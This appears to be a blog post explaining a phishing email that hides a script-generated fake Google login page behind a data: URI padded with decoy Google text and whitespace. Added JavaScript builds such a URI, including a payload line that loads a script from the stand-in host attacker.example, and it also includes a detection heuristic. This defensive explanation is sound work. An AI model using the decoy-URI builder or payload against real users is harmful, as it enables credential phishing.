Remember when people said you should look at the address bar to check whether a page is a phishing attempt? A friend of mine recently got an email that I found fairly interesting. The attack relies on a decent amount of social engineering (SE) to make the user think the page is legitimate: true, the green "padlock" isn't there, but google.com is.
It all started with an email that looked fairly normal; the one problem with it is of course the Google attachment. I don't use Google as a provider for this email, so a Roundcube email client and a Google attachment don't add up. The attackers are simply betting that the majority of people use Google accounts, so it's worth making the lure look like this.
The URL redirects twice before it reaches its destination, which is common with phishing attacks, most likely so the operator can swap the final page if one site is reported and taken down. The last hop refreshes into a data: URI, which browsers treat as inline content: everything after data:text/html, is the page itself, not an address to fetch. The data: URI begins with the text https://accounts.google.com/... purely as a decoy, followed by a long run of spaces before the <script> tag that actually produces the page. The padding pushes the script past the visible width of the address bar, so the bar shows only the Google text and most people will never scroll to see the rest. The text in the URL bar is therefore not the page's location at all; it is the code that builds the page. The tell is at the far left: the scheme is data:, not https:, and a data: page has no host of its own.
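To make the mechanism concrete, here is an added example (not code from the original post or from the phishing kit) that builds a data: URI of the shape described above and shows the two views of it: what a narrow address bar displays, and what the browser's URL parser actually sees. The decoy text, padding width and script source are assumptions made for illustration; the last function is a simple heuristic for this specific padding trick.

```javascript
// Added example: constructs a decoy data: URI (decoy Google text, long
// whitespace run, then the markup that becomes the page) and contrasts the
// address-bar view with the parser's view. DECOY, PADDING and PAYLOAD are
// assumed values, not taken from the real phishing page.
"use strict";

const DECOY = "https://accounts.google.com/ServiceLogin";               // assumed decoy text
const PADDING = " ".repeat(200);                                       // assumed padding width
const PAYLOAD = '<script src="https://attacker.example/login.js"></script>'; // hypothetical payload

// Build the deceptive data: URI: decoy text, padding, then the real markup.
function buildDecoyDataUri(decoy = DECOY, padding = PADDING, payload = PAYLOAD) {
  return `data:text/html,${decoy}${padding}${payload}`;
}

// Approximate what a narrow address bar shows: only the first `width` characters.
function addressBarView(href, width = 80) {
  return href.slice(0, width).trimEnd();
}

// The browser's own view of the same string, via the WHATWG URL parser.
// For a data: URI the scheme is "data:", the host is empty and the origin is
// the opaque "null": "google.com" appearing in the text does not make Google
// the origin of the page.
function describeOrigin(href) {
  const u = new URL(href);
  return { protocol: u.protocol, hostname: u.hostname, origin: u.origin };
}

// decodeURIComponent throws on malformed escapes; fall back to the raw text.
function safeDecode(s) {
  try {
    return decodeURIComponent(s);
  } catch {
    return s;
  }
}

// Heuristic for this particular trick: a data: URI whose body contains a long
// run of whitespace (raw or percent-encoded) immediately followed by markup.
function looksLikePaddedDataUri(href, minRun = 20) {
  if (!/^data:/i.test(href)) return false;
  const comma = href.indexOf(",");
  if (comma === -1) return false;
  const body = safeDecode(href.slice(comma + 1));
  return new RegExp(`\\s{${minRun},}<`).test(body);
}

// Demonstration on the constructed URI.
function demo() {
  const sample = buildDecoyDataUri();
  console.log("address bar shows :", addressBarView(sample));
  console.log("parser sees       :", describeOrigin(sample));
  console.log("padded data: URI? :", looksLikePaddedDataUri(sample));
  return sample;
}

demo();
```

Run it with Node and compare the two views: the address-bar slice ends at the decoy text and never reaches the <script> tag, while the parser reports protocol "data:", an empty hostname and origin "null". That is the check worth teaching people: read the scheme at the left edge of the bar, not the familiar words in the middle of it.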
The final result? You've already seen it, but it's rather convincing to a person who isn't too confident with computers. Maybe browsers need to look at changing how data: URIs are handled in the address bar (they have since moved in that direction: Chrome 60 and Firefox 59 block top-level navigation to data: URIs). Here's a video showing it live.